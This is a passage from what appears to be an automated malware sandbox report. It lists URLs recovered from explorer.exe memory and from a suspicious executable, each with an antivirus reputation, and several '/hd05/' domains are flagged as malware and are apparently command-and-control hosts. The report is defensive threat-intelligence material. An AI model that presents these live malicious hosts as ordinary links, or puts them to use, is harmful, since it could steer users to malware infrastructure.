www.vagabondtracks.com/hd05/	true	Avira URL Cloud: safe	unknown
http://www.blogonrunning.com/hd05/?mJBXxJ=L307NeH5fWkLgKK43su7TNgrL3oq/VFX5jHnogZ3Xy90kbIeezXbjunmo4QVhDvcCpqA&_hrl=jxopsZ	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.connect-talent.com	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://powerpoint.office.comer	explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.system.ngoReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trexendofparadise.club	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.trexendofparadise.club/hd05/www.system.ngo	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSA4	explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.musiletras.coReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.musiletras.co/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adop	explorer.exe, 0000001C.00000002.3874827939.0000000004B66000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aquariusbusiness.info/hd05/www.satwaspin.net	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.q3hjns.shop/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thingsidonaked.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.taxilasamericas.com/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1480835602.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2426276889.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.connect-talent.com/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.codyscalls.com/hd05/	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gaiacoreresearch.com/hd05/www.fursace.club	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.attack.infoReferer:	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.damtherncooling.com/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 0000001C.00000003.2506605753.0000000004971000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.blogonrunning.com/hd05/www.trexendofparadise.club	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lezxop.xyz	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 0000000A.00000002.2430854965.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1451364940.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.system.ngo	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.blogonrunning.com/hd05/www.lezxop.xyz	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.musiletras.co/hd05/www.connect-talent.com	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.damtherncooling.com/hd05/www.attack.info	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.evans-gdaddy-test-domain.online/hd05/www.7727.info	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.trexendofparadise.clubReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.system.ngo/hd05/	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.satwaspin.net	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.microsoft.c	explorer.exe, 0000000A.00000002.2426276889.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1445045558.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1480835602.0000000009237000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.vagabondtracks.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	po8909893299832.exe, 00000000.00000002.1447751241.000000000255E000.00000004.00000800.00020000.00000000.sdmp, InXlDTKncKkCk.exe, 0000000B.00000002.1489325585.0000000002C3E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOSd	explorer.exe, 0000000A.00000000.1451364940.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.1486110658.000000000BCAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2430854965.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.dropshunter.net/hd05/www.furanoikedanouen.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.system.ngo/hd05/www.vagabondtracks.com	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.9orwr6.vipReferer:	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2423484191.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2431529850.00000000048AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3871599666.00000000048AB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000A.00000003.1482870190.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1433567008.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lezxop.xyz/hd05/www.sparkfirestarter.net	explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.blogonrunning.com	explorer.exe, 0000000A.00000002.2433086710.000000000C14D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2538471968.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3878937034.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2548306618.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3690455688.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2553926787.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3691112872.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.2565249669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000003.3688885669.0000000008F7A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
